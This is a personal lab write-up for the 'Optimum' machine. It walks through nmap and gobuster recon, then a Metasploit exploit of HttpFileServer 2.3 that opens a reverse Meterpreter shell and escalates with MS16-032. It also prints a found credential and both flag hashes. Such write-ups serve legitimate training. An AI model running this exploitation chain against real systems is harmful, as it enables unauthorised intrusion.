Optimum

TARGET IP: 10.10.10.8

HOST IP: 10.10.16.10

Recon

NMAP

nmap [Target IP]
nmap [Target IP] -A -p 80

HTTP

  • Nothing on page source that I could find.

  • It is using HttpFileServer 2.3

    • Their latest version is 2.3m

  • The login button opens up prompt for login.

  • Let's take a crack at logging in with credentails admin:admin.

  • Discovered new directory /~login. This uses a tildy infront.

Vulnerable Software

  • HFS 2.3 is old and filled with goodies.

  • Lots of vulnerabilities are mentioned on their own website:

  • Exploit DB has two verified exploits 1 & 2.

Enumeration

Gobuster

gobuster dir -u http://[Target IP] -w /usr/share/dirb/wordlists/common.txt 
  • Try putting a ~ at the end since we saw that the /~login directory had it.

gobuster dir -u http://[Target IP]/~ -w /usr/share/dirb/wordlists/common.txt 

WinPEASx64

  • Credentials for kostas

kdeEjDowkS*
  • I need to be better at looking through these to see if I could've found more information.

Browsing

sysinfo
  • This will tell us the system is Windows 12 Server R2.

  • This is a 64-bit system.

Exploit

Metasploit

  • Let's check out Metasploit

msfconsole
search hfs

use 1
show options

set rhosts [Target IP]
set lhost [Host IP]
check 
exploit

  • Now we have a Meterpreter session.

shell
whoami

type C:\Users\kostas\Desktop\user.txt
  • User Flag

b9058357319a5b76f10e01253a382c67
  • Next step is to use Metasploit to gain root privileges. I tried browsing the system for a while but didn't find anything useful. The tool I need is a kernel exploit.

  • When we ran the sysinfo command we found the system is a Windows 2012 R2 server which is a 64-bit architecture. The reverse_tcp_shell that we are using as our payload is a 32-bit process. We should migrate over to a different process that is 64-bit.

  • On the meterpreter shell run the following.

ps

  • We see that the explorer.exe process is running on PID 660.

  • Let's migrate over to this process.

migrate [PID for explorer.exe]

  • Next, let's background the current meterpreter system we have in the system.

bg

  • We can confirm this has been backgrounded:

sessions

  • Since we now have access to the windows system, let's see if we can find another metasploit local exploit to root privileges.

search exploit/windows/local

  • I had to get a hint here and use a Microsoft vulnerability in the system MS16_032.

use 33

  • I'm not sure if winPEASx64 showed this somewhere but I could have also used a tool called window-exploit-suggester. Here is a write-up on how to use it. It's a bit complicated as you run it on your host system by exporting the target system info.

  • After selecting our exploit in Metasploit we will then set it up and run it.

show options
set session 1
set lhost [Host IP]

exploit

  • We now have a shell to the system as administrator.

shell
type C:\Users\Administrator\Desktop\root.txt

64869e78042316656ffc989ba52d5d2b

Conclusion

  • I knew going into this lab that I could use Metasploit. I didn't know when I would get to use it but knew it was an option. I wanted to try to get access to the system without Metasploit but I don't think my level of skill is high enough to do it, let alone understand it.

  • I need to work on my enumeration skills with Windows systems. I have a far better understanding of them with Linux and could probably spend some more time with Windows.

  • It was a good lab but I'd really like to finish one of these without help one day.

Last updated